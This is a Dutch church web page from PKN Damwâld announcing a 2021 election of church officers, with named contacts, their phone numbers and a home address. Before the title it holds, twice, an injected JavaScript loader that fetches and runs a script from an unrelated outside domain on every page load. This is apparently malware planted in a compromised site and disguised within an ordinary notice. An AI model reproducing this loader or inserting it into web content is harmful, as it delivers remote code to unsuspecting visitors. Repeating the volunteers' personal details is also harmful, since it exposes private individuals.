;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ambtsdragersverkiezing Hervormd Akkerwoude c.a. - PKN Damwâld

Ambtsdragersverkiezing Hervormd Akkerwoude c.a.

Gepubliceerd op: woensdag 29 september 2021

De afgelopen 1 ½ jaar zijn voor ons als gemeente en ook als kerkenraad een hele bijzondere periode geweest. Kerkdiensten, allerlei gemeenteactiviteiten en kerkenraadsvergaderingen werden op een creatieve manier gehouden. Hierin hebben we het ontmoeten met elkaar fysiek erg gemist. We zijn heel blij dat dat nu weer, met gepaste afstand, mogelijk is!

Een onderwerp waar we ons nu mee bezig gaan houden is de ambtsdragersverkiezing. In februari 2022 zullen een groot aantal ambtsdragers afscheid nemen. Een deel van deze ambtsdragers hebben inmiddels ook al verlengd met 2 jaar, waar we erg dankbaar voor zijn. De kerkenraad krijgt, zoals het zich laat aanzien te kampen met een zeer laag aantal leden. Hierbij vragen wij u als gemeente om uw verantwoordelijkheid te nemen door namen te noemen van gemeenteleden die u geschikt acht voor één van de vacante ambten en/of u aan zelf te melden als u een ambt overweegt.

De procedure die gevolgd wordt bij de ambtsdragersverkiezing is op hoofdlijnen gelijk aan de procedure zoals we die altijd gevolgd hebben. Nu de kerkenraad de vacatures heeft bepaald, wordt de gemeente gevraagd broeders/zusters (eventueel als duo) aan te bevelen die men geschikt acht voor de openstaande vacatures. De kerkenraad zal nadien de aanbevelingen bekijken en mogelijk met namen aanvullen. We zijn samen kerk. Uw inbreng is belangrijk! Gelukkig hoef je niet eerst examen te doen om ambtsdrager te worden. Diploma’s zijn hiervoor niet nodig. Wel vraagt het vertrouwen – geloof – dat God zelf voor Zijn kerk zorgt, hoop op Zijn koninkrijk en liefde voor mensen.

De zoektocht naar nieuwe ambtsdragers is altijd weer bijzonder. Dat mensen ondanks allerlei aarzelingen en volle agenda’s ‘ja’ zeggen tegen deze vraag vanuit de gemeente. Dat is om stil van te worden. Dat moet het werk van Gods Geest zijn. Roeping van Godswege. Er zijn immers genoeg redenen om ‘nee’ te zeggen.

Zonder bezieling door Gods Geest en de ontspanning – omdat de kerk niet van ons, maar van God is – houdt geen ambtsdrager het vol. Dus help mee of vul uw éigen naam in. Voor vragen over een ambt kunt u terecht bij de diverse voorzitters van de colleges: Ouderling: Annie Hellinga, tel: 424009, Jeugdouderling, Gerda Delfstra, tel: 424206, Diaken: Hotze van Dijk, tel: 424347, kerkrentmeester: Ebele v.d. Schaaf, tel: 421185, voorzitter van de kerkenraad Sjoerd Postma, tel:0511-402905 of bij ds. G.J. Otter, tel: 0511-421247.

U kunt uw ingevulde formulieren in een doos doen, die hiervoor op zondag 24 oktober in de hal van de Ontmoeting staat. Extra formulieren liggen ook in de kerk of zijn onder dit bericht te downloaden. U kunt de formulieren ook aan uw wijkouderling of –diaken meegeven, of uiterlijk dinsdag 26 oktober inleveren bij de scriba: Geralda Teertstra, Mr. P.T. v.d. Herberglaan 16, 9104 EK Damwâld (0511-424766) of mailen naar hervormdambv@hotmail.com.

We vragen om uw gebed voor de verkiezing van ambtsdragers, dat de juiste personen op de juiste plek in Gods wijngaard terecht zullen komen.